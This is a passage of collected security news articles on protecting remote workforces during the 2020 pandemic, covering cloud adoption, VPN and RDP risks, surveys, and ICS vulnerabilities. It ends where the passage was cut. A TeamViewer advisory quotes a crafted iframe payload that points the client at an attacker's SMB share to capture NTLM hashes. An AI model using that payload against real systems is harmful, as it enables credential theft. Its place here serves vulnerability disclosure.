2021 predictions for the Everywhere Enterprise

As we near 2021, it seems that the changes to our working life that came about in 2020 are set to remain. Businesses are transforming as companies continue to embrace remote working practices to adhere to government guidelines. What does the next year hold for organizations as they continue to adapt in the age of the Everywhere Enterprise?

everywhere enterprise

We will see the rush to the cloud continue

The pandemic saw more companies than ever move to the cloud as they sought collaboration and productivity tools for employee bases working from home. We expect that surge to continue as more companies realize the importance of the cloud in 2021. Businesses are prepared to preserve these new working models in the long term, some perhaps permanently: Google urged employees to continue working from home until at least next July and Twitter stated employees can work from home forever if they prefer.

Workforces around the world need to continue using alternatives to physical face-to-face meetings and remote collaboration tools will help. Cloud-based tools are perfect for that kind of functionality, which is partly why many customers that are not in the cloud, want to be. The customers who already started the cloud migration journey are also moving more resources to public cloud infrastructure.

People will be the new perimeter

While people will eventually return to the office, they won’t do so full-time, and they won’t return in droves. This shift will close the circle on a long trend that has been building since the mid-2000s: the dissolution of the network perimeter. The network and the devices that defined its perimeter will become even less special from a cybersecurity standpoint.

Instead, people will become the new perimeter. Their identity will define what they’re allowed to access, both inside and outside the corporate network. Even when they are logged into the network, they will have minimal access to resources until they and the device they are using have been authenticated and authorized. This approach, known as zero trust networking, will pervade everything, covering not just employees, but customers, contractors, and other business partners.

User experience will be increasingly important in remote working

Happy, productive workers are even more important during a pandemic. Especially as on average, employees are working three hours longer since the pandemic started, disrupting the work-life balance. It’s up to employers to focus on the user experience and make workers’ lives as easy as possible.

When the COVID-19 lockdown began, companies coped by expanding their remote VPN usage. That got them through the immediate crisis, but it was far from ideal. On-premises VPN appliances suffered a capacity crunch as they struggled to scale, creating performance issues, and users found themselves dealing with cumbersome VPN clients and log-ins. It worked for a few months, but as employees settle in to continue working from home in 2021, IT departments must concentrate on building a better remote user experience.

Old-school remote access mechanisms will fade away

This focus on the user experience will change the way that people access computing resources. In the old model, companies used a full VPN to tunnel all traffic via the enterprise network. This introduced latency issues, especially when accessing applications in the cloud because it meant routing all traffic back through the enterprise data center.

It’s time to stop routing cloud sessions through the enterprise network. Instead, companies should allow remote workers to access them directly. That means either sanitizing traffic on the device itself or in the cloud.

User authentication improvements

Part of that new approach to authentication involves better user verification. That will come in two parts. First, it’s time to ditch the password. The cybersecurity community has advocated this for a long time, but the work-from-home trend will accelerate it. Employees accessing from mobile devices are increasingly using biometric authentication, which is more secure and convenient.

The second improvement to user verification will see people logging into applications less often. Sessions will persist for longer, based on deep agent-based device knowledge that will form a big part of the remote access experience.

Changing customer interactions will require better mobile security

It isn’t just employees who will need better mobile security. Businesses will change the way that they interact with customers too. We can expect fewer person-to-person interactions in retail as social distancing rules continue. Instead, contact-free transactions will become more important and businesses will move to self-checkout options. Retailers must focus more on mobile devices for everything from browsing products, to ordering and payment.

The increase in QR codes presents a great threat

Retailers and other companies are already starting and will continue to use QR codes more and more to bridge contact with things like menus and payment systems, as well as comply with social distance rules. Users can scan them from two meters away, making them perfect for payments and product information.

The problem is that they were never designed for these applications or digital authentication and can easily be replaced with malicious codes that manipulate smartphones in unexpected and damaging ways. We can expect to see QR code fraud problems increase as the usage of these codes expands in 2021.

The age of the Everywhere Enterprise

One overarching message came through clearly in our conversations with customers: the enterprise changed for the longer term in 2020, and this will have profound effects in 2021. What began as a rushed reaction during a crisis this year will evolve during the next as the IT department joins HR in rethinking employee relationships in the age of the everywhere enterprise.

If 2020 was the year that businesses fell back on the ropes, 2021 will be the one where they bounce forward, moving from a rushed reaction into a thoughtful, measured response.

Accept your IT security limits and call in the experts

For many employees, the COVID-19 pandemic brought about something they dreamed of for years: the possibility to eschew long commutes, business attire and (finally!) work from their home.

IT security limits

Companies were forced to embrace the work-from-home switch and many are now starting to like the cost savings and the possibility to hire employees from a wider, non-localized pool of applicants.

But for IT security teams, the switch meant even more work and struggling finding new ways to keep their organization and their employees secure from an increasing number and frequency of cyber threats.

The pressure to deliver security is on

A recent LogMeIn report has also revealed that the transition to remote work for the majority of businesses has impacted the day-to-day work of IT professionals.

Aside from the expected technical tasks and an increased number of web meetings, over half of them have been forced to spend more time managing IT security threats and developing new security protocols. In fact, the percentage of IT professionals who are now spending 5 to 8 hours per day on IT security rose from 35 in 2019 to 47 in 2020.

“In terms of defensive tactics, the first two months of the pandemic shifted the previous network-centric thinking to endpoint and remote access. Many firms lacking endpoint detection and response or endpoint protection (next-gen AV) sought to roll out these services across their distributed organization. They also focused on IAM and VPN or SDP services,” Mark Sangster, VP and Industry Security Strategist at eSentire, told Help Net Security.

“The other shift moved thinking from BYOD to BYOH: Bring Your Office Home. Firms were faced with the challenge of securing connections from home offices made through consumer-grade networking gear provided by employee ISPs. These systems are not as hardened as commercial-grade internet devices and were often misconfigured or left in factory settings with default administrative credentials and wide-open Wi-Fi services. This effort required IT teams to help non-technical employees harden their home routers, better understand password security and embrace the necessity for multi-factor authentication and VPNs.”

Solving the security puzzle

Companies’ tech priorities have shifted as well, with many increasing spending for security.

But the need to implement new technology, the widening attack surface, and the onslaught of ransomware-wielding gangs have forced some companies to accept the limits of what they can do with in-house IT security staff and technology, and to seek additional assistance from outside detection and response experts.

The threat of ransomware is insidious and be particularly destructive, delivering a potentially fatal blow to some (often smaller) organizations.

“Firms need to understand the risks and prepare with proactive defenses (threat hunting), hot-swappable back-ups and fail-over colocation systems. The real trick is catching unauthorized activity quickly, before criminal groups are able to plant ransomware throughout the organization, steal data and then launch a synchronized attack to cripple the organization. This means being able to monitor VPN traffic (connections) and remote administrative activities to detect unauthorized movement,” Sangster explained.

“Criminal groups steal credentials to then access the business using remote tools. This MO is detectable, but it requires proactive hunting and constant monitoring of these services. We have stopped multiple attacks of this nature. In those cases, the ransom attack was either isolated to a single device (and quickly recovered in less than an hour), or it required coordinate defenses to block remote attacks through remote admin tools like Microsoft RDP or PowerShell. In these cases, machine learning flagged suspicious activity for further investigation by security analysts. This quick response meant dwell time was only minutes and prevented the criminal gang ransomware from metastasizing throughout the organization.”

Making history: The pandemic, disaster recovery and data protection

It was an accomplishment for the ages: within just a couple of days, IT departments hurriedly provided millions of newly homebound employees online access to the data and apps they needed to remain productive.

pandemic disaster recovery

Some employees were handed laptops as they left the building, while others made do with their own machines. Most connected to their corporate services via VPNs. Other companies harnessed the cloud and software and infrastructure services (SaaS, IaaS).

Bravo, IT! Not only did it all work, businesses and employees both saw the very real benefits of remote life, and that egg is not going back into the shell. Many won’t return to those offices and will continue work from home.

But while immediate access challenges were answered, this was not a long-term solution.

Let’s face it, because of the pandemic a lot of companies were caught off guard with insufficient plans for data protection and disaster recovery (DR). That isn’t easy in the best of times, never mind during a pandemic. Even those with effective strategies now must revisit and update them. Employees have insufficient home security. VPNs are difficult to manage and provision, perform poorly and are hard to scale. And, IT’s domain is now stretched across the corporate data center, cloud (often more than one), user endpoints and multiple SaaS providers.

There’s a lot to do. A plan that fully covers DR, data protection and availability is a must.

Local focus

There are several strategies for protecting endpoints. First off, if employees are using company-issued machines, there are many good mobile machine management products on the market. Sure, setting up clients for a volume of these will be a laborious task, but you’ll have peace of mind knowing data won’t go unprotected.

Another strategy is to create group policies that map the Desktop and My Documents folders directly to the cloud file storage of your choice, no matter if it’s Google Drive, OneDrive, Dropbox or some other solution. That can simplify file data protection but its success hinges on the employee storing documents in the right place. And if they keep them on their desktop, for example, they’re not going to be protected.

And right there is the rub with protecting employee machines – employees are going to store data on these devices. Often, insecure home Internet connections make these devices and data vulnerable. Further, if you add backup clients and/or software to employee-owned machines, you could encounter some privacy resistance.

Remote desktops can provide an elegant solution. We’ve heard “this is the year of virtual desktop infrastructure (VDI)” for over a decade. It’s something of a running joke in IT circles, but you know what? The current scenario could very well make this the year of remote desktops after all.

VDI performance in more sophisticated remote desktop solutions has greatly improved. With a robust platform configured properly, end-users can’t store data on their local machines – it’ll be safely kept behind a firewall with on-premises backup systems to protect and secure it.

Further, IT can set up virtual desktops to prevent cut and paste to the device. And because many solutions don’t require a client, it doesn’t matter what machine an employee uses – just make sure proper credentials are needed for access and include multi-factor authentication.

Pain in the SaaS

As if IT doesn’t have enough to worry about, there’s a potential SaaS issue that can cause a lot of pain. Most providers operate under the shared responsibility model. They secure infrastructure, ensure apps are available and data is safe in case of a large-scale disaster. But long-term, responsibility for granular protection of data rests on the shoulders of the customer.

Unfortunately, many organizations are unprepared. A January 2020 survey from OwnBackup of 2,000 Salesforce users found that 52% are not backing up their Salesforce data.

What happens if someone mistakenly deletes a Microsoft Office 365 document vital for a quarterly sales report and it’s not noticed for a while? Microsoft automatically empties recycle bins data after 30 days, so unless there’s backup in place, it’s gone for good.

Backup vendors provide products to protect data in most of the more common SaaS services, but if there’s not a data protection solution for one your organization is using, make data protection part of the service provider’s contract and insist they regularly send along copies of your data.

Making history

When it comes to a significant disaster, highly distributed environments can make recovery difficult. The cloud seems like a clear choice for storing DR and backup data, but while the commodity cloud providers make it easy and cheap to upload data, costs for retrieval are much higher. Also, remember that cloud recovery is different from on-prem, requiring expertise in areas like virtual machines and user access. And, if IT is handling cloud directly and has issues, keep in mind that it could be very difficult getting support.

During a disaster, you want to recover fast; you don’t want to be creating a backup and DR strategy as the leadership grits their teeth due to downtime. So, set your data protection strategy now, be sure each app is included, follow all dependencies and test over and over again. Employees and data may be in varied locations, so be sure you’re completely covered so your company can get back in the game faster.

While IT pulled off an amazing feat handling a rapid remote migration, to ensure your company’s future, you need to be certain it can protect data, even outside of the corporate firewall. With a backup and DR strategy for dispersed data in place, you’ll continue to be in a position to make history, instead of fading away.

Adapt cybersecurity programs to protect remote work environments

Earlier this year, businesses across the globe transitioned to a remote work environment almost overnight at unprecedented scale and speed. Security teams worked around the clock to empower and protect their newly distributed teams.

protect remote work

Protect and support a remote workforce

Cisco’s report found the majority of organizations around the world were at best only somewhat prepared in supporting their remote workforce. But, it has accelerated the adoption of technologies that enable employees to work securely from anywhere and on any device – preparing businesses to be flexible for whatever comes next. The survey found that:

  • 85% of organizations said that cybersecurity is extremely important or more important than before COVID-19
  • Secure access is the top cybersecurity challenge faced by the largest proportion of organizations (62%) when supporting remote workers
  • One in two respondents said endpoints, including corporate laptops and personal devices, are a challenge to protect in a remote environment
  • 66% of respondents indicated that the COVID-19 situation will result in an increase in cybersecurity investments

“Security and privacy are among the most significant social and economic issues of our lifetime,” said Jeetu Patel, SVP and GM of Cisco’s Security & Applications business.

“Cybersecurity historically has been overly complex. With this new way of working here to stay and organizations looking to increase their investment in cybersecurity, there’s a unique opportunity to transform the way we approach security as an industry to better meet the needs of our customers and end-users.”

People worried about the privacy of their tools

People are worried about the privacy of remote work tools and are skeptical whether companies are doing what is needed to keep their data safe. Despite the pandemic, they want little or no change to privacy requirements, and they want to see companies be more transparent regarding how they use their customer’s data.

Organizations have the opportunity to build confidence and trust by embedding privacy into their products and communicating their practices clearly and simply to their customers. The survey found that:

  • 60% of respondents were concerned about the privacy of remote collaboration tools
  • 53% want little or no change to existing privacy laws
  • 48% feel they are unable to effectively protect their data today, and the main reason is that they can’t figure out what companies are doing with their data
  • 56% believe governments should play a primary role in protecting consumer data, and consumers are highly supportive of the privacy laws enacted in their country

“Privacy is much more than just a compliance obligation. It is a fundamental human right and business imperative that is critical to building and maintaining customer trust,” said Harvey Jang, VP, Chief Privacy Officer, Cisco. “The core privacy and ethical principles of transparency, fairness, and accountability will guide us in this new, digital-first world.”

Organizations with remote workforces need new security solutions

Remote work has left many organizations lagging in productivity and revenue due to remote access solutions. 19% of IT leaders surveyed said they often or always experience network performance and latency issues when using legacy remote access solutions, with an additional 43% saying they sometimes do.

security solutions remote

Those issues have resulted in a loss of productivity for 68% of respondents and a loss of revenue for 43%, a Perimeter 81 report reveals.

According to the report, organizations securely connect to internal networks in a variety of ways when working remotely. Some 66% reported using VPNs, 58% said they use a cloud service through a web browser, 48% rely on a remote access solution, and 34% use a firewall.

The many organizations still using legacy solutions like VPNs and firewalls will struggle to scale, face bottlenecks, and lack network visibility.

security solutions and remote work

33% of respondents said a password is the only way they authenticate themselves to gain access to systems. And while 62% of IT managers said they are using cloud-based security solutions to secure remote access, 49% said they’re still using a firewall, and 41% a hardware VPN.

But there are signs of progress, as organizations increasingly favor modern cloud-based solutions over outdated legacy solutions. Following the pandemic and a switch to remote work, 72% of respondents said they’re very or completely likely to increase adoption of cloud-based security solutions, 38% higher than before the pandemic.

“With today’s increasingly distributed and mobile workforce, the traditional and perimeter-based network model no longer makes sense,” said Perimeter 81 CEO Amit Bareket.

“It’s no surprise that companies are increasingly moving to cloud-based cyber and network security platforms. As corporations of all sizes rely on the cloud to run their businesses, they need new ways of consuming security to effectively prevent cyberattacks regardless of their location or network environment.”

Other key findings

  • 74% of respondents are adopting cloud-based security solutions over hardware due to security concerns. 44% are doing so due to scalability concerns, and 43% cited time-saving considerations.
  • 61% of organizations believe that having to protect new devices is the greatest security concern in light of remote work, while 56% said their greatest concern was lack of visibility into remote user activity.
  • 39% of respondents reported that scalability is their greatest challenge in securing the remote workforce, while 38% said budget allocation was their greatest challenge.

Companies continue to expose unsafe network services to the internet

33% of companies within the digital supply chain expose common network services such as data storage, remote access and network administration to the internet, according to RiskRecon. In addition, organizations that expose unsafe services to the internet also exhibit more critical security findings.

expose unsafe network services

The research is based on an assessment of millions of internet-facing systems across approximately 40,000 commercial and public institutions. The data was analyzed in two strategic ways: the direct proportion of internet-facing hosts running unsafe services, as well as the percentage of companies that expose unsafe services somewhere across their infrastructure.

The research concludes that the impact is further heightened when vendors and business partners run unsafe, exposed services used by their digital supply chain customers.

“Blocking internet access to unsafe network services is one of the most basic security hygiene practices. The fact that one-third of companies in the digital supply chain are failing at one of the most basic cybersecurity practices should serve as a wake up call to executives third-party risk management teams,” said Kelly White, CEO, RiskRecon.

“We have a long way to go in hardening the infrastructure that we all depend on to safely operate our businesses and protect consumer data. Risk managers will be well served to leverage objective data to better understand and act on their third-party risk.”

Expose unsafe network services: Key findings

  • 33% of organizations expose one or more unsafe services across hosts under their control. As such, admins should either eliminate direct internet access or deploy compensating controls for when/if such services are required.
  • Direct internet access to database services should be prohibited or secured. Within the top three unsafe network services, datastores, such as S3 buckets and MySQL databases are the most commonly exposed.
  • Digital transformation and the shift to remote work needs to be considered. Remote access is the second most commonly exposed service; admins should consider restricting the accessibility of these services only to authorized and internal users.
  • Universities are woefully exposed. With a culture that boasts open access to information and collaboration, the education sector has the greatest tendency to expose unsafe network services on non-student systems, with 51.9% of universities running unsafe services.
  • Global regions lack proper security posture. Countries such as the Ukraine, Indonesia, Bulgaria, Mexico and Poland confirm the highest rate of domestically-hosted systems running unsafe services.
  • Beware of ElasticSearch and MongoDB. Firms that expose these services to the internet have a 4x to 5x higher rate of severe security findings than those who do not run on internet-facing hosts.
  • Unsafe services uncover other security issues. Failing to patch software and implement web encryption are two of the most prevalent security findings associated with unsafe services.

expose unsafe network services

“This research should be welcome news to organizations struggling under the pressure to conduct exhaustive and time-consuming security assessments of their external business partners,” said Jay Jacobs, partner, Cyentia Institute.

“Similar to how medical doctors diagnose illnesses through various outward signs exhibited by their patients, third-party risk programs can perform quick, reliable diagnostics to identify underlying cybersecurity ailments.

“Not only is the presence of unsafe network services a problem in itself, but the data we examine in this report also shows that they’re a symptom of broader problems. Easy, reliable risk like this offer a rare quick win for risk assessments.”

Bring your own PC and SASE security to transform global businesses

Bring your own PC (BYOPC) security will reach mainstream adoption in the next two to five years, while it will take five to 10 years for mainstream adoption of secure access service edge (SASE) to take place, according to Gartner. Hype cycle for endpoint security, 2020 “Prior to the COVID-19 pandemic, there was little interest in BYOPC,” said Rob Smith, senior research director at Gartner. “At the start of the pandemic, organizations simply had no … More

The post Bring your own PC and SASE security to transform global businesses appeared first on Help Net Security.

A look at enterprise network and application modernization efforts

80% of organizations are struggling to reach application delivery requirements with their existing infrastructure. But, amid pandemic concerns, efforts to modernize networks and applications to address this challenge are accelerating with 83% reporting budget increases for these initiatives over the next three years, NS1 reveals.

enterprise network application

“Modernization was already on the radar for many organizations, but the pandemic has shocked the system and created a heightened sense of urgency,” said Kris Beevers, CEO, NS1. “Our research shows that IT leaders are accelerating projects aimed to increase efficiencies and business agility, improve application performance and user experiences, and drive additional revenue.”

Challenges to enterprise network and application modernization efforts

Within the broad scope of IT modernization, companies are prioritizing transformation initiatives for mobility (70%), remote data access (68%), automation (65%), security (61%), and IT resilience (60%).

Other areas where efforts are accelerating include public and private cloud deployments (58% and 57% respectively), improvements to scalability (58%) and deployment velocity (56%).

And yet, even with the heightened sense of urgency and budget behind them, survey respondents reported facing a number of obstacles in their IT modernization projects. Although four out of five acknowledge some progress with modernization, only 8% report that they have achieved their initial objectives, and 28% report “significant progress” (75% or greater).

Challenges to modernization include a talent and skills gap and competing priorities (37% each), as well as aging networks (35%) and the outdated, inflexible organizational structures that often come with them.

“Static, legacy tech drags down modernization efforts because it lacks the flexibility and agility necessary to support dynamic, scalable applications and IT environments,” added Beevers.

“Successful digital transformation starts with the underlying enterprise network and application infrastructure — DNS, DHCP and IP address management. When purpose-built for speed, reliability and scalability, these foundational technologies are critical in expediting modernization projects, automating network management tasks, and increasing efficiency and operational velocity in complex heterogeneous environments.”

Adoption and trends in the modern IT landscape

The study examined the adoption of modern technology across mid- to large-sized companies and uncovered the following trends.

The study found that 45% of respondents are currently using DDI, and another 48% plan to adopt the technology within 12 months. Adopters reported the most common use cases to be accelerating service discovery in microservices environments (60%) and connecting cloud and on-premise applications and data (56%).

enterprise network application

Those with plans to implement DDI cited the following use cases as the most appealing:

  • Connecting cloud and on-premise applications and data (59%)
  • Accelerating application delivery (55%)
  • Automating network management tasks (54%)
  • Accelerating service discovery in microservices environments (42%)
  • Controlling costs associated with application and network management (40%)

Modern application stack

Nearly all companies are adopting modern application stack solutions, many of which are aimed directly at addressing network and application performance requirements, including:

  • Network monitoring tools, which 96% of respondents were either already implementing or planning to, within 12 months
  • Public/private cloud, multi-cloud – 94%
  • Automation and orchestration solutions – 93%
  • Intelligent traffic management – 87%
  • Multi-CDN – 85%

Most ICS vulnerabilities disclosed this year can be exploited remotely

More than 70% of ICS vulnerabilities disclosed in the first half of 2020 can be exploited remotely, highlighting the importance of protecting internet-facing ICS devices and remote access connections, according to Claroty.

ICS vulnerabilities exploited remotely

The report comprises The Claroty Research Team’s assessment of 365 ICS vulnerabilities published by the National Vulnerability Database (NVD) and 139 ICS advisories issued by the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) during 1H 2020, affecting 53 vendors. The research team discovered 26 of the vulnerabilities included in this data set.

Compared to 1H 2019, ICS vulnerabilities published by the NVD increased by 10.3% from 331, while ICS-CERT advisories increased by 32.4% from 105. More than 75% of vulnerabilities were assigned high or critical Common Vulnerability Scoring System (CVSS) scores.

“There is a heightened awareness of the risks posed by ICS vulnerabilities and a sharpened focus among researchers and vendors to identify and remediate these vulnerabilities as effectively and efficiently as possible,” said Amir Preminger, VP of Research at Claroty.

“We recognized the critical need to understand, evaluate, and report on the comprehensive ICS risk and vulnerability landscape to benefit the entire OT security community.

“Our findings show how important it is for organizations to protect remote access connections and internet-facing ICS devices, and to protect against phishing, spam, and ransomware, in order to minimize and mitigate the potential impacts of these threats.”

Prominence of RCE vulns highlights need to protect internet-facing ICS devices

According to the report, more than 70% of the vulnerabilities published by the NVD can be exploited remotely, reinforcing the fact that fully air-gapped ICS networks that are isolated from cyber threats have become vastly uncommon.

Additionally, the most common potential impact was remote code execution (RCE), possible with 49% of vulnerabilities – reflecting its prominence as the leading area of focus within the OT security research community – followed by the ability to read application data (41%), cause denial of service (DoS) (39%), and bypass protection mechanisms (37%).

The prominence of remote exploitation has been exacerbated by the rapid global shift to a remote workforce and the increased reliance on remote access to ICS networks in response to the COVID-19 pandemic.

ICS vulnerabilities exploited remotely

Vulnerabilities on the rise

The energy, critical manufacturing, and water & wastewater infrastructure sectors were by far the most impacted by vulnerabilities published in ICS-CERT advisories during 1H 2020.

Of the 385 unique Common Vulnerabilities and Exposures (CVEs) included in the advisories, energy had 236, critical manufacturing had 197, and water & wastewater had 171. Compared to 1H 2019, water & wastewater experienced the largest increase of CVEs (122.1%), while critical manufacturing increased by 87.3% and energy by 58.9%.

Assessment of ICS vulnerabilities discovered

The research team discovered 26 ICS vulnerabilities disclosed during 1H 2020, prioritizing critical or high-risk vulnerabilities that could affect the availability, reliability, and safety of industrial operations.

The team focused on ICS vendors and products with vast install bases, integral roles in industrial operations, and those that utilize protocols in which researchers have considerable expertise. These 26 vulnerabilities could have serious impacts on affected OT networks, because more than 60% enable some form of RCE.

SD-WAN: A key enabler for remote workforces and enhanced security

For the third year SD-WAN adoption continues to grow with an ever-increasing interest in managed and co-managed offerings to navigate through the complexities of an integrated network and security solution, Masergy reveals.

SD-WAN adoption

Single strategy

The timing of the survey during the global pandemic uncovered the challenges posed in a work-from-home environment with security and business continuity rising as top priorities.

The study analyzes responses from IT decision makers in global enterprises across a variety of industries. Findings reveal that security and network infrastructure are the top two areas of focus to ensure business continuity and enable remote work.

Converging the network and security into a single strategy is also important today, as is having a managed service provider for assistance.

SD-WAN adoption: Key findings

  • Enabling remote work and collaboration tools are now top IT investments with 44 percent of respondents prioritizing the support of their homebound workforces.
  • 64 percent of survey participants report they are investing more in network infrastructure than they did last quarter, and SD-WAN adoption trends have continued to rise with each study. This year, 56 percent of respondents said they are piloting, installing, or upgrading SD-WAN installations. In 2017, that number was 35 percent.
  • Security remains an overwhelming focus with 91 percent of survey participants expressing interest in services that converge SD-WAN and security – also known as secure access service edge (SASE) solutions.
  • Multi-cloud connectivity ranks as the top SD-WAN capability (66 percent) as IT leaders look to address the challenges of cloud application performance and communications continuity.
  • Enterprises are shifting more toward wanting a managed SD-WAN solution with 45 percent opting for a fully-managed approach, and 29 percent opting for co-managed, while just 25 percent prefer a do-it-yourself approach.

SD-WAN adoption

“With working from home emerging as the ‘new normal,’ supporting remote workers has increased the urgency with which IT departments are approaching their network, security, and cloud infrastructures,” said Becky Carr, CMO, Masergy.

“As such, it is not surprising to see the transformative impact of SD-WAN and SASE solutions become the new necessity for achieving secure remote access and reliable performance for cloud applications.”

TeamViewer flaw could be exploited to crack users’ password

A high-risk vulnerability (CVE-2020-13699) in TeamViewer for Windows could be exploited by remote attackers to crack users’ password and, consequently, lead to further system exploitation.

CVE-2020-13699

About TeamViewer

TeamViewer is an application developed by German company TeamViewer GmbH and is available for Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 and BlackBerry operating systems.

It is used primarily for remote access to and control of various types of computer systems and mobile devices, but also offers collaboration and presentation features (e.g., desktop sharing, web conferencing, file transfer, etc.)

Since the advent of COVID-19, enterprise use of the software has increased due to many employees being forced to work from home.

About the vulnerability (CVE-2020-13699)

CVE-2020-13699 is a security weakness arising from an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.

“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play attacker-IPsharefake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.

“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”

As noted before, exploitation of the flaw can be initiated remotely and requires no previous authentication. The flaw seems ideal for targeted watering hole attacks.

There is no indication that this vulnerability is being exploited in the wild and no public exploit is currently available.

CIS assesses that the risk of exploitation is high for large and medium government and business entities, medium for small government and business entities, and low for home users.

According to the company, the vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. Users are advised to upgrade to version 15.8.3 to close the hole.

Many companies have not taken basic steps to protect their remote workforce

New research shows almost three quarters of large businesses believe remote working policies introduced to help stop the spread of COVID-19 are making their companies more vulnerable to cyberattacks. You need to take steps to protect the remote workforce AT&T’s study of 800 cybersecurity professionals across the UK, France and Germany shows that while 88% initially felt well prepared for the migration, 55% now believe widespread remote working is making their companies more or much … More

The post Many companies have not taken basic steps to protect their remote workforce appeared first on Help Net Security.

Researchers find critical RCE vulnerabilities in industrial VPN solutions

Critical vulnerabilities in several industrial VPN implementations for remotely accessing operational technology (OT) networks could allow attackers to overwrite data, execute malicious code or commands, cause a DoS condition, and more.

vulnerabilities industrial VPN

“Exploiting these vulnerabilities can give an attacker direct access to the field devices and cause some physical damage,” Claroty researchers noted.

The vulnerabilities

Since COVID-19 stepped on the global stage, enterprise-grade VPN installations have become a must for any organization that relies on a remote workforce. Simultaneously, they’ve become great targets for criminals looking for a way into company’s IT networks and assets.

This situation has spurred the researchers to search for vulnerabilities in industrial VPN solutions used by remote operators and third-party vendors for accessing, maintaining and monitoring field controllers, programmable logic controllers (PLCs) and input/output (IO) devices deployed at oil and gas installations, water utilities and electric utilities.

These include Secomea’s GateManager M2M Server, Moxa’s industrial VPN servers with an all-in-one secure router, and HMS Networks’s eCatcher VPN client.

Secomea’s GateManager, which is an ICS remote access server deployed worldwide as a cloud-based SaaS solution with many general-purpose and white-label instances deployed, has been found to have several flaws, all pretty serious:

  • CVE-2020-14500 – arising from the improper handling of some of the HTTP request headers provided by the client, it could be exploited – remotely and without authentication – to execute malicious code and effectively gain access to a customer’s internal network
  • CVE-2020-14508 – an off-by-one error bug that may allow an attacker to achieve RCE or cause a DoS condition
  • CVE-2020-14510 – hardcoded telnet credentials
  • CVE-2020-14512 – weak hash type that could reveal users’ passwords

Moxa’s EDR-G902 and EDR-G903 series secure routers/VPN servers sport a stack-based buffer overflow bug (CVE-2020-14511) that could lead to RCE.

Finally, there’s a stack-buffer overflow bug (CVE-2020-14498) in HMS Networks’ eCatcher, a proprietary VPN client that is used to connect to the company’s eWon VPN device, which allows machine builders and factory owners to remotely monitor the performance of their equipment.

This bug can be triggered by tricking targets into visiting a malicious website or opening a malicious email with a specifically crafted HTML element.

“By sending socially engineered emails that embed specifically crafted images capable of exploiting CVE-2020-14498, an attacker could execute code with the highest privileges and completely take over a victim’s machine just by making the victim view the malicious email,” the researchers demonstrated.

“The exploitation phase occurs immediately when the email client (e.g. Outlook) is loading the malicious images.”

What’s next?

The good news is that all of these flaws have been patched. The bad news is there are surely more of them that have yet to be unearthed, possibly by individuals with malicious intent.

With ransomware attackers increasingly looking for ways to disrupt mission-critical systems for force companies to pay hefty sums, we can predict that, sooner or later, they will exploit vulnerabilities in OT-specific solutions.

“We would also like to emphasize that these vulnerabilities reinforce the unique risks inherent to OT remote access,” the researchers noted.

“While the security features of most VPNs make them generally well-suited and secure for IT remote access, such features tend to be less comprehensive than the stringent role- and policy-based administrative controls and monitoring capabilities required to secure OT remote access connections and minimize the risks introduced by employees and third-parties.”

Surge in unique clients reporting brute-force attack attempts

There’s a significant uptick in the number of unique clients who have reported brute-force attack attempts, ESET reveals.

brute-force attack attempts

Trend of RDP attack attempts against unique clients (per day) detected by ESET

The trend has been observed since the onset of the global pandemic. The COVID-19 crisis has radically changed the nature of everyday work, forcing employees to manage large parts of their jobs via remote access.

Cybercriminals exploiting remote work

Cybercriminals – especially ransomware operators – are aware of the shift and attempt to exploit the new opportunities and increase their illicit earnings. In the period between January 2020 and May 2020, the United States, China, Russia, Germany and France topped the list of countries with most IPs used for brute-force attacks.

“Before the lockdown, most employees worked from the office and used infrastructure monitored and controlled by their IT department. But the coronavirus pandemic has brought a major shift to the status quo.

“Today, a huge proportion of ‘office’ work occurs via home devices, with workers accessing sensitive company systems through Windows’ Remote Desktop Protocol (RDP), a proprietary solution created by Microsoft to allow connecting to the corporate network from remote computers,” explains Ondrej Kubovič, ESET Security Research & Awareness Specialist.

“Despite the increasing importance of RDP, as well as other remote access services, organizations often neglect its settings and protection. Employees use easy-to-guess passwords, and without additional layers of authentication or protection, there is little that can stop cybercriminals from compromising an organization’s systems,” Kubovič continues.

According to telemetry, most of the blocked IPs in January–May 2020 were seen in the United States, China, Russia, Germany and France. Countries that had the largest proportion of targeted IPs were Russia, Germany, Japan, Brazil and Hungary.

RDP has become a popular attack vector

RDP has become a popular attack vector in the past few years, especially among ransomware gangs. These cybercriminals often brute-force their way into a poorly secured network, elevate their rights to admin level, disable or uninstall security solutions, and then run ransomware to encrypt crucial company data.

However, other malicious actors try to exploit poorly secured RDP to install coin-mining malware or create backdoors, which can be used in case their unauthorized RDP access has been identified and closed.

Remote work in the time of COVID-19

The COVID-19 pandemic has, in one broad swipe, rewritten the rules regarding our workforce and jobs, with an almost instantaneous transition to remote work for those who were able to. While certain jobs require physical presence, a number of jobs fortunately can be done while working offsite.

remote work COVID-19

For those companies that went into remote work mode back in March, there was little time to prepare and organizations that did not have remote work plans or policies already in place had to scramble to figure things out. Invariably, additional security challenges arose and had to be overcome.

Due to the rapidity of the transition, companies were caught off guard in a number of ways. Not having enough VPN or remote desktop licenses, dealing with higher than expected network traffic because of Zoom video meetings, and trying to provide secure access to internal applications, databases, and other tools that were not designed to be used from outside the corporate network – these are just the tip of the iceberg.

Those who work with sensitive information such as health information, financial data, intellectual property, source code, contracts, agreements, and other documents that require safe handling need a secure messaging platform. And IT security can be challenging for workers who are outside corporate firewalls and using personal computers and devices.

Remaining safe while working remotely

With employees being remote, companies not only have less control over the technology being used by employees, but home environments are much more vulnerable and leave employees susceptible to phishing attacks. This is where VNPs come in handy. VPNs can extend corporate security to protect people outside normal office environments—think of it as a firewall that magically extends to wherever that outside person sits.

But VPNs are not silver bullets. Secure messaging is also a key component as information is now flowing to a node outside the corporate network. Further, any information stored on a device outside the company ideally should be secured with encryption or other means.

While using VPNs is always a solid option, with the growth of cloud services, people can perform many job functions without the use of a VPN. Logging into Salesforce or Microsoft Office 365 can be done through any browser and may be preferred because of the convenience. However, if this is performed on a personal computer that is outside the IT team’s purview or control, the company may be unable to ensure proper security measures are in place.

Employee training as a key component to company protection

